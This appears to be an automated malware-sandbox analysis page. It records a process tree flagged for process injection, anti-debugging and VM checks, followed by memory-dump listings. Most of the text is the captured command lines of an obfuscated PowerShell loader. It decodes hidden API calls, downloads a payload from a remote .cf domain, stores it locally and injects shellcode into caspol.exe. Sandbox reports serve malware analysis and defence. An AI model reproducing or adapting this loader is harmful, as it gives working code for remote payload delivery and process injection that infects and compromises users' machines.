Ir'Ta1Mi3So6Ga3Gi5KoFMi4Dd2Ma4Tr5Hy5ChEUn5Ak5At1De7Ho0SlAFe1fr7Rj6BaCRe6He4Ad4DeERe4Tt4Pn4Bo3an5Fr2Ve5MoAUn1Di9Fo6De5He4Ti2Ad5Sl9Xo4Co3Fi5EuERi5SpAEt5Sc2Po1St9Ub7bjENe5Gt9Ur4Un3Pf5In2De4Ku5Re5Re8Po4Po7Re6My4Va5re2Tr4Ro5Ac4Ko1Dr5SvEGr5Br4Ti5lg2Ju4Ku4No1La9In7HjALi5De6Tj4Au5Gr4Di4St5LaFDe5Sk6Sa5StBPa6SuAFe0deDSi0EiDSk7Ce0Re5In2Ta4Sa3Se7St3Ls5Tw2Ch5ArBLi5Ci2Gn5Se0as5Ru6ta4De3Ne5Bo2Ac7In1Ba5in8We4Gv5Pa7Ca1Kr4Vo2Sk5Pr9Zo5Be4He4Bo3De5BaEEg5De8Pr5Pr9Ka6Ki7pe5Un8un5FaEBe5St9Ra4pu3Ma5Fa2In4Sn5Ti1JaFer1UnFBo5In1In5DaCAf4Lj7El1Fl7Om1Et3In6Re0Po5Rr2Du5Ma6Bi4Sa3La5IlFan5St2Ud4Tr5Ar1Er7Mi1Gu3Te7Gi3Ge5KvEFo5Fl4Va5RaFAn5Gn2Vi0Op3Pr1AxEWo1DrBHm1Un7He1ApFgl7Ne0Ud7Ob3La6Bl3co1Re7Re7Fr7pi1heFMu6DiCEk7TrETh5Ka9Di4St3Fa6An7Ca4Di3Ov4Ta5ka6ElAPa1ReBSl1Co7Co6KlCUn6Oc2Bl7EhEFe5Hi9Re4Ra3Ti0Sa4Fu0Pa5Tr6ScAAt1VaBca1Di7Bl6ToCEp6An2Ta7UdEPr5Ka9Pa4Ab3Si0So4Ta0St5Ga6PaASu1AdBLo1Ha7Cr6SeCUd6Sh2Cl7AcESu5Si9Ke4Up3Fr0Ma4Ge0Ca5Fi6KlASe1MoEHe1An7Pr1BoFFi6FrCfa7LuEPo5Qu9Tu4Fi3La6Mo7Ps4Pi3Sk4En5Fa6elAAf1BeESp1DoEPe1ArEEa'Re;Va&lo(Un`$MeDpoimecTahAneSk7Si)Hu fo`$kaDPeiBoaAfnRoaMalMiuLanab6Hy;Ma`$DrSsklSaePrnBetElrPieFl1Ov7Ug7ta Eu=Ko SufCykRupOv Fe`$ChDTeiSocHohSyene5Na Ur`$GeDSuiAfcNehCoePr6Ov;Pr`$HyDStiJiaAfnFoaSclBiuUmnPo7Th Sk=Hm UrHSnTNuBPi Ga'Sp1ma3No7Fi1Ba4Af2Rn5FrBSe5Me3Fr4Da3av4Ri5Di5Ma1te5To1De5Th2Hf0ar4te1Ke7Na0OrAMo1Li7Se1Na3Se6Jo3Un5NaFPo4Sl2Cu4se5Ph5KoEKo5ad5De1Se9On7SiEFo5Ju9Fa4Fu1Pr5Al8Kl5SkCBs5An2Ti1RaFlo6FoCUn7FaETe5To9On4Fi3Ra6Pa7Po4Me3Ca4pr5Me6SlAVe0AnDOf0EaDBl6UnDSa5Op2un4Un5In5Un8Dk1ViBPl1So7Bo0St1en0Vr3In0MeFIn1SaBPr1Ho7pa0Ul7Ti4AnFGu0Fo4Fr0Pr7Ti0Ga7Ve0To7Bi1foBSu1Li7Fo0Un7Ad4ExFOf0J 3Tr0Fo7Wh1UnEUn'Mi;Go&At(Ke`$DoDReiKucBehCoere7op)Ma Ri`$HjDNyiVeaRenPsaEmlLiuCrnVe7Ti;Ra`$UnDStiUnarenKoaNolKvuvinRe8Re Un=St foHReTUdBAt Co'Tr1Ar3Cl7OmBFu5co8Di4bu2fe5ba9Im5Be6Un5Om9Si5KrEMi4Un4Re5ep5Pi5Re8Sc1Fi7Av0MoAAn1Or7At1Un3Or6Sg3Re5ReFni4Bi2Sk4So5Ju5JeEUn5Cl5Ou1Fl9Rr7hlEka5De9Cr4As1Re5Br8Un5InCmu5Sa2Br1PrFLe6HoCUr7DeEmu5Ro9Si4Ov3Sa6El7Ce4Si3Sa4Eh5Sk6StATy0LoDAf0suDGa6SpDWi5Wa2ha4ya5Di5St8Bl1InBIn1Pr7Ka0Ly5Fi0Cl7He0St1Fe0Hu2Sk0Ma1Ma0Bo6Om0sa5Te0KeFGa1KeBUn1St7Ve0Pr7Te4BeFIn0De4Ko0th7Te0In7Ap0Or7Go1MaBMi1Ud7He0Sy7Fo4WiFSe0In3Pa1KoEDe'Ka;Di&Zy(En`$PlDFuiSocOehPieRe7La)Fr Sk`$DeDEliPaaTenAzaPalBouDenRe8To;Ca`$PaiPhsUnoSnmKo0Ju1St he=Sm Pi'KohOptVetUnpDu:ko/En/SymTrelagTroMioPlkFobCopBenPrqTy.KocPafHe/paUEmnOviYonUrtAaeMerEf.NetSphConkr'Pi;or`$NyiGrsKloCrmEl0mi0zo Da=So UnHUnTUfBBa Ko'Mo1Re3un7Va5Mi4Re5Ir5Wi2De5Or3Fj4Ap3Sa5Yd1St5De6Id4Al1Ne5Is9He5mo2In1Sy7Un0InATi1Ke7No1TiFRe7Ib9Cy5Re2Ha4Fi0Re1TaASp7Se8Af5Pr5Uo5IdDAr5Pa2St5Sk4Be4Hy3Pa1Re7Me7Af9St5Ye2Ca4Ek3li1Ex9Vi6Sa0Ku5Oc2Ko5Ne5Pr7ar4Af5BrBPo5TiEan5Su2Ba5Av9Kr4Op3cr1JoESk1Ga9Ma7Ad3Pa5Fe8Be4Am0Pu5Sq9Bi5KoBUn5Vr8Bo5Ha6Ca5Ti3Ju6Is4Fl4Pr3Sp4sp5Ni5MoEBr5Sv9Cr5St0Ta1HyFSl1La3ge5SkESt4Su4Fr5Pr8Bl5PaASw0Pr7He0Ex6Bo1KaESa'Od;Ar`$AtDFoiJeaJonOuaBelSkuKonsc8Sa Ca=ka FoHVeTOtBIt an'Sa1mi3Sk7Av1El4Ki2Pe5AnBEp5Ho3Uo4Se3Fr4No5Sj5St1Bi5Sp1To5Ce2Ob0Ah5Po0TrAba1So3be5Ob2Sp5Ne9Kv4Em1Ar0CoDTo5Pr6Em4Pl7Tu4Kl7Sy5St3Fl5Wa6Ka4Po3Tw5Bl6Co'Bu;El&Br(tr`$kaDPriOicTrhFoehu7Gl)Br Th`$BaDUfiOvaFenSpaHolSuuUnnDe8Qu;Sk`$ruFAcuKolTudPhtUdrJyfSufBrePi2Sa=Ti`$ScFTeuDolWaddetSurUnfTjfaneHa2Sa+Lo'Sa\UdHWyaOunRhdSe.pidDoaBltVi'La;Bi`$saBCarveeIndIntRafbyaEnvNanTeeme=No'Aj'Co;SciGifVa Sk(Sa-PrnStoSttHi(CuTReeSwsHatSp-AmPRaaHvtGhhWe La`$CoFUnuStlPrdAptcorStfUlfKreEk2Ab)Ar)St At{BowBihSkiDolAfeTh Mo(Fa`$TrBPrrSpeSudMutKafLiaGovConPleAr Re-DeeprqAf Ps'Un'De)In Ce{Vi&Ek(Pe`$NiDFuiUncSahFoele7Tr)Au Te`$LiiUnsScoSnmIg0Se0Pr;SpSBatKaaJurExtAn-CoSdelUleDeeExpKo Kv5Lu;Mo}GrSOveOptDe-mnCBroUnnBitSueAtnSatDe Ge`$ChFKouWolApdSktParAlfPsfsnePr2Om Ch`$HyBUnrIseSkdGrtRefThaSqvBynbreBi;Sp}Uf`$MoBJirLieBrdtatCofFlaThvErnUdeRe Te=Ud TaGLiedatIn-LoCsaoAfnSntOpeUnnhotHa Se`$CaFScuBrlDudvatSurBefCufKjeVa2fa;Pr`$OrDMeiPraDinReaSllfiuDence9Ep Ap=Du leHNiTLaBLe Mn'Vr1Ta3Co7Se3Sj5GoEUd5Pr6Ug5Wa9Tr5Sq6Tr5elBSt4Pa2In5Hj9De1tr7Tu0UsAHj1st7Ma6AjCPa6ka4Sr4UdEMi4Da4Bo4op3Di5Cy2Va5StAVi1So9Sk7Po4Fo5To8Fu5Ha9Mi4Ti1Sy5Ca2om4Ci5ha4Og3qu6moAAg0ChDPa0YaDRi7Bl1Av4Bi5Me5Ku8Ra5WiAAa7De5Se5Ge6de4Re4Sk5Po2Un0Re1Hv0Ka3Ml6an4Un4Ov3Ka4La5Be5FlESc5en9Fu5Un0Ja1prFTi1Hr3Su7Un5va4Fu5fo5Um2To5Di3un4Do3Si5Af1Mi5Pe6Ra4Hj1Sa5Br9Be5fe2Co1CoEAt'Af;Pe&Mi(An`$DoDCaiRocHohBleIn7Pe)Bi Sp`$DrDJuivraPlnbeaInlDyuCrnGa9St;da`$FoBInrAfePldBotEgfShaWevSmnGeeWa0Gg Ep=Mi CaHorTLuBOt Pe'An6BiCKj6Be4Fo4OvEde4Be4Gr4Se3Fl5Ga2Ju5MeACo1Ko9Li6Ga5Br4An2Be5Gr9Pe4Uv3Du5TrEPa5CiATr5Fo2Th1ov9Ic7fuEda5Po9Tw4Br3Fo5Re2Ba4An5Sk5Me8Pr4Ru7No6Ma4Nu5Do2bo4Im5In4Du1Vo5GoETe5Be4ru5Ko2Re4Hj4Pa1Me9Un7FrASp5Pr6Re4Bo5In4Re4Ro5OvFGo5Dr6Pr5ToBEl6AsAPr0BeDIn0AfDto7Gi4Me5Un8Sv4fe7ke4peEBe1NiFre1Tr3Ma7Sk3Un5GaEPa5Ou6Ku5hy9De5Gr6Es5PoBIn4Be2Fo5Go9Ko1KoBSl1Dr7Kl0Kj7Un1DeBPr1St7re1Di7Sk1Tr3In7So1Sl4Cr2Mi5CiBSi5Hy3Op4Ef3Re4Ab5Te5Un1Bo5Ce1Un5Pu2Fr0Ba4Ed1SkBNo1Kr7Ga0Ma1Le0Ud3de0BrFPa1faEBe'Kn;At&Br(Of`$AfDmiiCycHahPoeTr7Sy)Ki in`$BaBLirSteAndMotFofGaaNevStnUmeAu0Km;Un`$TrPLeiElnLesKaeRrdinaSa=Pr`$KnDFoiNoaDrnHuaAvlInuStnPr.SecTeoBouHenLitAv-De6ex4ha8Ac;Lu`$BeBFlrEseAsdAstSpfAgaTevPenTaeSh1Fr In=Ny BoHDeTDyBAl Kn'We6CoCSt6Sh4Po4PeECr4To4Ne4Sp3De5Sc2De5SpASa1Se9Aa6Co5Co4Me2Li5Un9Op4Fr3No5VdEEs5BlARe5Ov2Lf1In9Em7CoETa5Re9Re4Me3Bi5Ek2De4St5Sc5Na8Pa4St7Pr6Au4Ca5Hi2Co4Sp5Fo4Sc1Me5PrESw5Li4so5Re2Mo4Pl4Fa1Sk9An7RuADe5Un6St4gu5Ar4De4Al5BeFGe5In6Re5HoBAf6HyAAb0BuDEf0HaDDe7Un4Id5Ef8Fo4Jo7Lo4JeECh1WrFHa1Fr3Je7Be3Ha5spEAn5At6Ni5No9In5Se6Pa5InBGr4Ho2Fi5me9ab1WaBop1Ga7Se0De1Sp0In3Ab0IrFUn1NoBHe1Hy7Ki1Br3Dd7GaBRu5Fr8Al4Ho2Di5Pe9sk5Fo6De5Un9Mu5BeENo4te4Ha5Fo5mu5Sa8Iv1EkBUn1Pe7mo1Sk3In6Un7Ad5ReEMe5Sh9Cr4Fa4Su5As2Hj5Sa3Ga5Bl6Di1KuEpe'Fi;Co&El(Gr`$StDKeiPlclrhSueHy7Ha)Co Ko`$RaBForTyeAddCotFofReaPevfrnhoeFe1St;Ud`$GoBTorEmeDedLetCefAfaUnvSlnKaesu2Qu Co=Sa PiHHjTStBsk Pa'Ob1Vi3Fl6To4Li4Pa3At5HeESm5BuBPr5moBFi5Br2st5Sy3ka1He7Fo0SuAFo1Sn7Co6VaCAc6Wo4Ai4ClEto4Ha4Hk4Pa3Af5Pa2Pa5RuACo1Re9Ku6Ra5Ko4No2se5Cu9Po4De3Be5JoEde5bnAFe5Te2Ma1Sk9Sp7BaEUd5Pr9My4Ne3Ta5He2Ce4Bu5Pa5Ra8me4Ir7Ma6Du4Un5Al2Pr4Nb5Me4Re1Ov5afENe5Ud4Jo5Bi2Fa4Bi4Un1Af9Ja7SuACr5Un6Ec4Ar5Br4Ar4Og5BrFTr5Fa6Ko5RiBJo6SiAAd0RuDPa0OsDpe7Bi0St5Hj2In4Di3re7Br3Ro5Em2Fr5OvBAf5Ca2Be5Tu0He5Tr6Be4Pa3Ps5Re2Mi7Ho1to5Nu8Al4Hj5He7Pr1He4Br2Te5In9cr5Ma4An4Bn3Fy5DeEAf5Ga8En5Do9Bl6St7Su5Ta8Sy5myEWa5Ra9hv4Aa3Fa5Py2be4Fo5An1EfFPr1SqFFd5Am1Ze5AfCEt4Il7Ol1In7Ar1Gr3Sk7Em5Va5Ha2Bo5Ci5Fr4In2Sp5al3Ek5Sn2Mo5FoBOv4De4Re5Gi2Pa1Em7Fe1Ka3Si6Fo4Re5Be2ec5Un3Om5av3Pr1HoETe1SiBda1Be7Sc1BlFAd7Su0Ps7Fo3Tw6Ta3Sh1Le7Pl7Ba7Pr1SeFPr6FoCco7noEOv5Ep9Al4Ud3Ma6Ex7Re4va3Pa4Vo5bh6MaASt1VaBTe1Ka7Mr6LeCBa7UnEDe5No9Se4Na3Bu6Ga7Tp4Da3At4Ba5Po6FeASh1CiBIn1Re7Pe6ReCBr7GrEno5Ta9Am4Sa3Sk6da7Ar4Pi3Fo4Br5Pi6FiAKa1BaBGa1Ss7Ep6ArCSa7NuETi5Ne9Sn4Co3Ku6Be7Re4At3Er4Sj5Me6BrARk1CrBCe1Om7Za6BaCKr7SyEDi5Pi9Ae4Ki3Ob6At7sk4Wh3Ud4se5Pa6waAEx1ExENa1Bu7Pr1TuFQa6XyCAf7SaESc5Je9Tr4St3No6wi7re4Da3Se4De5Ov6SkADe1AlEPi1LyECh1MiEBr'Go;Uk&Ur(bo`$SuDReiBlcGrhPaeSe7Gl)Fi Sp`$TrBTrrGaeUndRhtUnfAlaBivFonVieFu2Da;li`$StBEprzeesedMatBofSnaVavPrnUdeKi3In So=Sk DeHkoTZoBSi Ti'br1Br3Cy6Tr4Ex4Pa3Ra5KoERe5MaBTr5UdBCo5Pl2Ch5Az3Pe1Re9Af7KoEAt5Dy9Pe4Ba1Wi5De8Pa5MiCNa5Cr2Fl1KrFCh1Ku3Nu7Le1Ov4Bi2At5FiBFe5No3Ju4Ku3Sj4ap5Do5Ki1Pa5Sy1Sp5Af2Lo0Te4Ic1ZoBPr1kl3Mu7ApBNu5Op8Be4Li2Li5Un9Gt5Ce6Un5Re9Gu5SyETr4Ud4Ha5gi5Ma5Dy8Un1NgBTo1Si3Re6Th4Vi5WhBSe5Sa2St5Er9Ha4Ba3Pr4Fa5Gu5Du2Pr0Su6Be0du0Fe0Tr0He1DiBUn0Vo7So1BrBCo0Mi7go1AfEpr'mo;Fo&Se(Yo`$StDGyiRecGrhNseAn7Ud)Ku At`$CyBDiroveFadUntNofSuaskvSenIneFo3Sq#Ov;""";Function Bredtfavne9 { param([String]$Bathy); For($Grey=2; $Grey -lt $Bathy.Length-1; $Grey+=(2+1)){$isom = $isom + $Bathy.Substring($Grey, 1)}; $isom;}$Escribie0 = Bredtfavne9 'ReITeEeqXFr ';$Escribie1= Bredtfavne9 $Spalt;if([IntPtr]::size -eq 8){.$env:windir\S*64\W*Power*\v1.0\*ll.exe $Escribie1 ;}else{&$Escribie0 $Escribie1;}"2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1804 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "Function HTB { param([String]$Bathy); $Lavadelsme135 = ''; Write-Host $Lavadelsme135; Write-Host $Lavadelsme135; Write-Host $Lavadelsme135; $Teniacida = New-Object byte[] ($Bathy.Length / 2); For($Grey=0; $Grey -lt $Bathy.Length; $Grey+=2){ $Teniacida[$Grey/2] = [convert]::ToByte($Bathy.Substring($Grey, 2), 16); $Teniacida[$Grey/2] = ($Teniacida[$Grey/2] -bxor 55); } [String][System.Text.Encoding]::ASCII.GetString($Teniacida);}$poemetsch0=HTB '644E4443525A19535B5B';$poemetsch1=HTB '7A5E5445584458514319605E590405196259445651527956435E41527A52435F585344';$poemetsch2=HTB '7052436745585476535345524444';$poemetsch3=HTB '644E4443525A19654259435E5A52197E594352455847645245415E545244197F5659535B52655251';$poemetsch4=HTB '4443455E5950';$poemetsch5=HTB '7052437A5853425B527F5659535B52';$poemetsch6=HTB '6563644752545E565B79565A521B177F5E5352754E645E501B176742555B5E54';$poemetsch7=HTB '654259435E5A521B177A565956505253';$poemetsch8=HTB '6552515B525443525373525B5250564352';$poemetsch9=HTB '7E597A525A58454E7A5853425B52';$Diche0=HTB '7A4E73525B5250564352634E4752';$Diche1=HTB '745B5644441B176742555B5E541B176452565B52531B177659445E745B5644441B1776424358745B564444';$Diche2=HTB '7E5941585C52';$Diche3=HTB '6742555B5E541B177F5E5352754E645E501B17795240645B58431B17615E454342565B';$Diche4=HTB '615E454342565B765B5B5854';$Diche5=HTB '5943535B5B';$Diche6=HTB '794367455843525443615E454342565B7A525A58454E';$Diche7=HTB '7E726F';$Diche8=HTB '6B';$Bebudelse=HTB '626472650405';$Sedd=HTB '74565B5B605E595358406745585476';function fkp {Param ($Superst, $Artful) ;$Dianalun0 =HTB '137958595B5E56555E5B170A171F6C76474773585A565E596A0D0D7442454552594373585A565E5919705243764444525A555B5E52441F1E174B17605F5245521A78555D525443174C17136819705B5855565B764444525A555B4E7456545F52171A765953171368197B585456435E58591964475B5E431F13735E545F520F1E6C1A066A19724642565B441F134758525A524344545F071E174A1E19705243634E47521F134758525A524344545F061E';&($Diche7) $Dianalun0;$Dianalun5 = HTB '1363455847170A17137958595B5E56555E5B197052437A52435F58531F134758525A524344545F051B176C634E47526C6A6A17771F134758525A524344545F041B17134758525A524344545F031E1E';&($Diche7) $Dianalun5;$Dianalun1 = HTB '455243424559171363455847197E5941585C521F1359425B5B1B17771F6C644E4443525A19654259435E5A52197E594352455847645245415E545244197F5659535B526552516A1F7952401A78555D52544317644E4443525A19654259435E5A52197E594352455847645245415E545244197F5659535B526552511F1F7952401A78555D525443177E59436743451E1B171F137958595B5E56555E5B197052437A52435F58531F134758525A524344545F021E1E197E5941585C521F1359425B5B1B17771F13644247524544431E1E1E1E1B171376454351425B1E1E';&($Diche7) $Dianalun1;}function GDT {Param ([Parameter(Position = 0, Mandatory = $True)] [Type[]] $Trfsikkerr,[Parameter(Position = 1)] [Type] $Konklaven = [Void]);$Dianalun2 = HTB '1371564552595843170A176C76474773585A565E596A0D0D7442454552594373585A565E59197352515E5952734E59565A5E54764444525A555B4E1F1F7952401A78555D52544317644E4443525A196552515B5254435E585919764444525A555B4E79565A521F134758525A524344545F0F1E1E1B176C644E4443525A196552515B5254435E585919725A5E4319764444525A555B4E75425E5B5352457654545244446A0D0D6542591E197352515E5952734E59565A5E547A5853425B521F134758525A524344545F0E1B171351565B44521E197352515E5952634E47521F13735E545F52071B1713735E545F52061B176C644E4443525A197A425B435E5456444373525B52505643526A1E';&($Diche7) $Dianalun2;$Dianalun3 = HTB '1371564552595843197352515E595274585944434542544358451F134758525A524344545F011B176C644E4443525A196552515B5254435E58591974565B5B5E5950745859415259435E5859446A0D0D64435659535645531B1713634551445E5C5C5245451E196452437E5A475B525A52594356435E5859715B5650441F134758525A524344545F001E';&($Diche7) $Dianalun3;$Dianalun4 = HTB '1371564552595843197352515E59527A52435F58531F13735E545F52051B1713735E545F52041B17137C58595C5B564152591B1713634551445E5C5C5245451E196452437E5A475B525A52594356435E5859715B5650441F134758525A524344545F001E';&($Diche7) $Dianalun4;$Dianalun5 = HTB '45524342455917137156455259584319744552564352634E47521F1E';&($Diche7) $Dianalun5 ;}$Weather = HTB '5C524559525B0405';$Dianalun6 = HTB '13635F42455E55170A176C644E4443525A19654259435E5A52197E594352455847645245415E545244197A5645445F565B6A0D0D70524373525B525056435271584571425954435E585967585E594352451F1F515C471713605256435F52451713735E545F52031E1B171F70736317771F6C7E59436743456A1B176C627E594304056A1B176C627E594304056A1B176C627E594304056A1E171F6C7E59436743456A1E1E1E';&($Diche7) $Dianalun6;$Slentre177 = fkp $Diche5 $Diche6;$Dianalun7 = HTB '1371425B53434551515204170A1713635F42455E55197E5941585C521F6C7E59436743456A0D0D6D5245581B1701030F1B17074F040707071B17074F03071E';&($Diche7) $Dianalun7;$Dianalun8 = HTB '137B58425956595E445558170A1713635F42455E55197E5941585C521F6C7E59436743456A0D0D6D5245581B17050701020106050F1B17074F040707071B17074F031E';&($Diche7) $Dianalun8;$isom01 = 'http://megookbpnq.cf/Uninter.thn';$isom00 = HTB '1375455253435156415952170A171F7952401A78555D5254431779524319605255745B5E5259431E19735840595B5856536443455E59501F135E44585A07061E';$Dianalun8 = HTB '1371425B534345515152050A135259410D56474753564356';&($Diche7) $Dianalun8;$Fuldtrffe2=$Fuldtrffe2+'\Hand.dat';$Bredtfavne='';if (-not(Test-Path $Fuldtrffe2)) {while ($Bredtfavne -eq '') {&($Diche7) $isom00;Start-Sleep 5;}Set-Content $Fuldtrffe2 $Bredtfavne;}$Bredtfavne = Get-Content $Fuldtrffe2;$Dianalun9 = HTB '13735E5659565B4259170A176C644E4443525A19745859415245436A0D0D7145585A7556445201036443455E59501F13754552534351564159521E';&($Diche7) $Dianalun9;$Bredtfavne0 = HTB '6C644E4443525A19654259435E5A52197E594352455847645245415E545244197A5645445F565B6A0D0D7458474E1F13735E5659565B42591B17071B17171371425B534345515152041B1701030F1E';&($Diche7) $Bredtfavne0;$Pinseda=$Dianalun.count-648;$Bredtfavne1 = HTB '6C644E4443525A19654259435E5A52197E594352455847645245415E545244197A5645445F565B6A0D0D7458474E1F13735E5659565B42591B1701030F1B17137B58425956595E4455581B1713675E59445253561E';&($Diche7) $Bredtfavne1;$Bredtfavne2 = HTB '1364435E5B5B5253170A176C644E4443525A19654259435E5A52197E594352455847645245415E545244197A5645445F565B6A0D0D70524373525B525056435271584571425954435E585967585E594352451F1F515C4717137552554253525B44521713645253531E1B171F70736317771F6C7E59436743456A1B176C7E59436743456A1B176C7E59436743456A1B176C7E59436743456A1B176C7E59436743456A1E171F6C7E59436743456A1E1E1E';&($Diche7) $Bredtfavne2;$Bredtfavne3 = HTB '1364435E5B5B5253197E5941585C521F1371425B534345515152041B137B58425956595E4455581B13645B52594345520600001B071B071E';&($Diche7) $Bredtfavne3#"3⤵
- Blocklisted process makes network request
- Checks QEMU agent file
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1872 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.exe"4⤵
- Checks QEMU agent file
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3008 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3008 -s 19205⤵
- Program crash
PID:4432
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 3008 -ip 30081⤵PID:4188
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
memory/384-132-0x0000000000000000-mapping.dmp
-
memory/1804-164-0x00007FFB85BD0000-0x00007FFB86691000-memory.dmpFilesize
10.8MB
-
memory/1804-134-0x0000000000000000-mapping.dmp
-
memory/1804-135-0x0000025B71C10000-0x0000025B71C32000-memory.dmpFilesize
136KB
-
memory/1804-136-0x00007FFB85BD0000-0x00007FFB86691000-memory.dmpFilesize
10.8MB
-
memory/1804-149-0x00007FFB85BD0000-0x00007FFB86691000-memory.dmpFilesize
10.8MB
-
memory/1872-148-0x0000000008E50000-0x00000000093F4000-memory.dmpFilesize
5.6MB
-
memory/1872-153-0x0000000077560000-0x0000000077703000-memory.dmpFilesize
1.6MB
-
memory/1872-140-0x0000000004BE0000-0x0000000004C02000-memory.dmpFilesize
136KB
-
memory/1872-141-0x0000000004C80000-0x0000000004CE6000-memory.dmpFilesize
408KB
-
memory/1872-142-0x0000000005390000-0x00000000053F6000-memory.dmpFilesize
408KB
-
memory/1872-143-0x0000000005AB0000-0x0000000005ACE000-memory.dmpFilesize
120KB
-
memory/1872-144-0x0000000007410000-0x0000000007A8A000-memory.dmpFilesize
6.5MB
-
memory/1872-145-0x0000000006000000-0x000000000601A000-memory.dmpFilesize
104KB
-
memory/1872-146-0x0000000006D90000-0x0000000006E26000-memory.dmpFilesize
600KB
-
memory/1872-147-0x0000000006AE0000-0x0000000006B02000-memory.dmpFilesize
136KB
-
memory/1872-138-0x0000000004510000-0x0000000004546000-memory.dmpFilesize
216KB
-
memory/1872-137-0x0000000000000000-mapping.dmp
-
memory/1872-150-0x0000000007A90000-0x0000000008E43000-memory.dmpFilesize
19.7MB
-
memory/1872-163-0x0000000077560000-0x0000000077703000-memory.dmpFilesize
1.6MB
-
memory/1872-152-0x00007FFBA3FB0000-0x00007FFBA41A5000-memory.dmpFilesize
2.0MB
-
memory/1872-139-0x0000000004CF0000-0x0000000005318000-memory.dmpFilesize
6.2MB
-
memory/1872-162-0x0000000007A90000-0x0000000008E43000-memory.dmpFilesize
19.7MB
-
memory/3008-155-0x00007FFBA3FB0000-0x00007FFBA41A5000-memory.dmpFilesize
2.0MB
-
memory/3008-156-0x0000000077560000-0x0000000077703000-memory.dmpFilesize
1.6MB
-
memory/3008-157-0x0000000000400000-0x000000000062B000-memory.dmpFilesize
2.2MB
-
memory/3008-158-0x0000000000401000-0x000000000062B000-memory.dmpFilesize
2.2MB
-
memory/3008-160-0x0000000000400000-0x000000000043A000-memory.dmpFilesize
232KB
-
memory/3008-161-0x00000000207B0000-0x000000002084C000-memory.dmpFilesize
624KB
-
memory/3008-154-0x0000000000D50000-0x0000000002103000-memory.dmpFilesize
19.7MB
-
memory/3008-151-0x0000000000000000-mapping.dmp
-
memory/3008-165-0x0000000000D50000-0x0000000002103000-memory.dmpFilesize
19.7MB
-
memory/3008-166-0x00007FFBA3FB0000-0x00007FFBA41A5000-memory.dmpFilesize
2.0MB
-
memory/3008-167-0x0000000077560000-0x0000000077703000-memory.dmpFilesize
1.6MB
-
memory/4820-133-0x0000000000000000-mapping.dmp